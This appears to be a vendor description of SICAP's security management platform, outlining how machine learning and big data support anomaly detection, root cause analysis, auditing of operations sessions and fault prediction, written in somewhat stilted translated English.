In the face of diversified business services and increasingly serious security threats, in order to build a comprehensive security management and control platform, it is necessary to integrate more security prevention and control systems, which also generates a large amount of data. How to make better use of platform data to improve the overall security management and control capabilities, intelligent analysis of data is particularly important.
Intelligent data analysis is the application of big data technology, machine learning, pattern recognition and other intelligent algorithms to analyze data based on different business scenarios and provide more efficient intelligent management.
Based on big data, machine learning and other technologies, the intelligent analysis of asset information, user behavior, monitoring data, equipment logs, network traffic and other data has been realized, and abnormal risk analysis, root cause analysis, intelligent audit, intelligent operation and maintenance, and intelligent analysis have been realized.
1) Anomaly risk analysis, including:
Log anomaly detection: Detects abnormal logs and potential risks based on technologies and algorithms such as log clustering, pattern recognition, and machine learning.
Abnormal behavior analysis: Establish a baseline of behavior, correlate user and asset behavior, and use algorithms such as machine learning to find out suspicious abnormal behaviors that seriously deviate from the baseline.
Threat attack monitoring: Based on network traffic, applying artificial intelligence technologies and algorithms such as machine learning, retrospectively analyzing abnormal network behaviors, and matching them with threat intelligence and behavior models to discover potential security threats and unknown network attacks.
2) Root cause analysis: For alarms or abnormal events, combined with the relationship between assets and business, intelligent algorithms such as decision tree and correlation analysis are applied to locate the root cause of the problem and effectively shorten the fault resolution time.
3) Intelligent auditing: For O&M sessions and historical audit records, big data and machine learning algorithms are applied to form a rule base by analyzing character commands and user behaviors, and whether O&M operation commands and operation behaviors are normal by matching the rule base, so as to intelligently audit O&M sessions and update the rule base according to the final audit results.
4) Intelligent O&M: For the alarm or event information triggered by the monitoring system, the alarm or event information is processed by means of compression strategy, intelligent algorithm, knowledge graph and other means to determine the root cause of the failure. Compared with the O&M knowledge base, on the one hand, it can provide O&M suggestions to shorten the problem resolution time. On the other hand, it can trigger the O&M solution in specific scenarios, automatically recover the fault, feedback the recovery results to the O&M personnel, and review the fault and store the knowledge afterwards, forming a closed loop of intelligent O&M.
5) Intelligence: Relying on big data analysis and machine learning capabilities, a fault model for business scenarios is established, and correlation analysis and deep learning are carried out based on the correlation of historical alarms. At the same time, combined with the real-time data obtained by the monitoring system, the trend analysis of IT faults is carried out, and the alarms that may occur in the future are warned to realize the intelligence of faults.
In the future, SICAP will conduct in-depth research based on big data, supported by algorithms, and scenario-oriented, so as to realize the application of intelligent data analysis in more scenarios such as risk assessment and intelligent response, and build a more intelligent open security management platform.